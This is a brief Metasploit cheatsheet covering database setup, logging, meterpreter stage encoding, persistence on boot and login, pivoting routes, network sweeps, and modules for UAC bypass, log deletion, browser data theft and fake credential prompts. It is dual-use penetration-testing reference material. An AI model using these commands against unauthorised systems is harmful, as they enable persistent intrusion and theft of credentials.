title: Metasploit Framework
categories: [cheatsheets]
1) Initialize Database
sh> service postgresql start
sh> msfdb init
2) Check Database Status:
msf> db_status
3) Update Metasploit:
sh> msfupdate
4) Logging in Metasploit
msf> set ConsoleLogging yes
msf> set SessionLogging yes // also logs future sessions
msf> spool <FileName> // write console output to a file
msf> save // persist the current settings
1) Encode the meterpreter stages (the stage is encoded, not encrypted):
msf> set EnableStageEncoding true
2) Autostart a script in a new meterpreter session
msf> set AutoRunScript post/windows/manage/migrate
-> or: some modules offer a PrependMigrate option instead
msf> run persistence -p <PORT> -r <RHOST> -X -U -P <PAYLOAD>
-X: start on system boot
-U: start on user login
Important:
1) Create a route through a session for pivoting
msf> route add <netaddr> <netmask> <sess-id>
msf> route add 10.10.10.0 255.255.255.0 1
2) Explore the routed network
2.a) ping_sweep (runs through the session, so it doesn't need a route)
msf> use post/multi/gather/ping_sweep
msf> set RHOSTS 10.10.10.1-255
msf> set SESSION 2
msf> run
2.b) arp_sweep
msf> use post/multi/gather/arp_sweep
2.c) portscans
msf> use auxiliary/scanner/portscan/tcp
I) Exploitation
exploit/windows/local/bypassuac // UAC bypass
exploit/windows/local/trusted_service_path // checks for unquoted service paths
II) Information Gathering
post/windows/gather/winenum // mp> run winenum (-c: delete logs, -r: download registry, -m: run winenum in a separate session)
post/windows/enum_chrome // get browser data from Chrome, Firefox and IE with the three modules below
post/windows/enum_firefox
post/windows/enum_ie
post/windows/gather/phish_windows_credentials // PowerShell login prompt for social engineering
III) Auxiliary
auxiliary/scanner/smb/smb_version
auxiliary/admin/smb/samba_symlink_traversal // follows symlinks (only if the share config has follow symlinks = yes)